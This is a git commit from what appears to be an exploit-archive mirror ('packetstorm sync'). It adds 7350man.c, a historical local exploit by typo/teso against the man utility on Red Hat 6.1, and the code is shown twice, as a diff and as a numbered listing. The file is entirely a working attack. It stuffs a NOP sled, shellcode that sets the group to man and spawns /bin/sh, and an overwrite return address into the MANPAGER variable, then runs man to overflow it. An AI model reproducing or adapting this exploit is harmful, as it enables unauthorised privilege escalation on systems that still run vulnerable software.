packetstorm sync

author: SkyperTHC 2026-03-03 06:28:55 +0000
committer: SkyperTHC 2026-03-03 06:28:55 +0000
commit: 5d3573ef7a109ee70416fe94db098fe6a769a798 (patch)
tree: dc2d5b294c9db8ab2db7433511f94e1c4bb8b698 /exploits/7350man
parent: c6c59dc73cc4586357f93ab38ecf459e98675cc5 (diff)
1 files changed, 36 insertions, 0 deletions
diff --git a/exploits/7350man/7350man.c b/exploits/7350man/7350man.c
new file mode 100644
index 0000000..eaa0377
--- /dev/null
+++ b/exploits/7350man/7350man.c
@@ -0,0 +1,36 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#define OFFSET 0xbfffb32e
+#define LEN 4061
+#define GID "15" /* man::15: on rh6.1 */
+unsigned char shellcode[] =
+"\x31\xc0\x31\xdb\x31\xc9\xb3"GID"\xb1"GID"\xb0\x47\xcd\x80\xeb\x1e"
+"\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\x8d\x53"
+"\x0c\xb0\x0b\xcd\x80\x89\xc3\x31\xc0\xb0\x01\xcd\x80\xe8\xdd\xff\xff"
+"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x74\x65\x73\x6f\x63\x72\x65\x77\x21"
+"\x21";
+/* man sploit by typo/teso (typo@inferno.tusculum.edu) */
+int main(int argc, char *argv[]) 
+{
+    int offset = argc > 1 ? atoi(argv[1]) + OFFSET : OFFSET;
+    int eob    = argc > 2 ? atoi(argv[2]) : LEN;
+    char *buffer;
+    printf("eob = %d, offset = 0x%x\n", eob, offset);
+    buffer = malloc(eob+8);
+    memset(buffer, 0x90, eob);
+    memcpy(buffer + eob - strlen(shellcode) - 8, shellcode, strlen(shellcode));
+    memcpy(buffer + eob - 4, &offset, 4);
+    buffer[eob] = '\0'; 
+    setenv("MANPAGER", buffer, 1);
+    execlp("man", "man", "man", NULL);
+}
author	SkyperTHC	2026-03-03 06:28:55 +0000
committer	SkyperTHC	2026-03-03 06:28:55 +0000
commit	5d3573ef7a109ee70416fe94db098fe6a769a798 (patch)
tree	dc2d5b294c9db8ab2db7433511f94e1c4bb8b698 /exploits/7350man
parent	c6c59dc73cc4586357f93ab38ecf459e98675cc5 (diff)

diff --git a/exploits/7350man/7350man.c b/exploits/7350man/7350man.c new file mode 100644 index 0000000..eaa0377 --- /dev/null +++ b/exploits/7350man/7350man.c
@@ -0,0 +1,36 @@
	1	#include <stdio.h>
	2	#include <stdlib.h>
	3	#include <string.h>
	4	#include <unistd.h>
	5
	6	#define OFFSET 0xbfffb32e
	7	#define LEN 4061
	8
	9	#define GID "15" /* man::15: on rh6.1 */
	10
	11	unsigned char shellcode[] =
	12	"\x31\xc0\x31\xdb\x31\xc9\xb3"GID"\xb1"GID"\xb0\x47\xcd\x80\xeb\x1e"
	13	"\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\x8d\x53"
	14	"\x0c\xb0\x0b\xcd\x80\x89\xc3\x31\xc0\xb0\x01\xcd\x80\xe8\xdd\xff\xff"
	15	"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x74\x65\x73\x6f\x63\x72\x65\x77\x21"
	16	"\x21";
	17
	18	/* man sploit by typo/teso (typo@inferno.tusculum.edu) */
	19	int main(int argc, char *argv[])
	20	{
	21	int offset = argc > 1 ? atoi(argv[1]) + OFFSET : OFFSET;
	22	int eob = argc > 2 ? atoi(argv[2]) : LEN;
	23	char *buffer;
	24
	25	printf("eob = %d, offset = 0x%x\n", eob, offset);
	26	buffer = malloc(eob+8);
	27
	28	memset(buffer, 0x90, eob);
	29	memcpy(buffer + eob - strlen(shellcode) - 8, shellcode, strlen(shellcode));
	30	memcpy(buffer + eob - 4, &offset, 4);
	31	buffer[eob] = '\0';
	32
	33	setenv("MANPAGER", buffer, 1);
	34	execlp("man", "man", "man", NULL);
	35	}
	36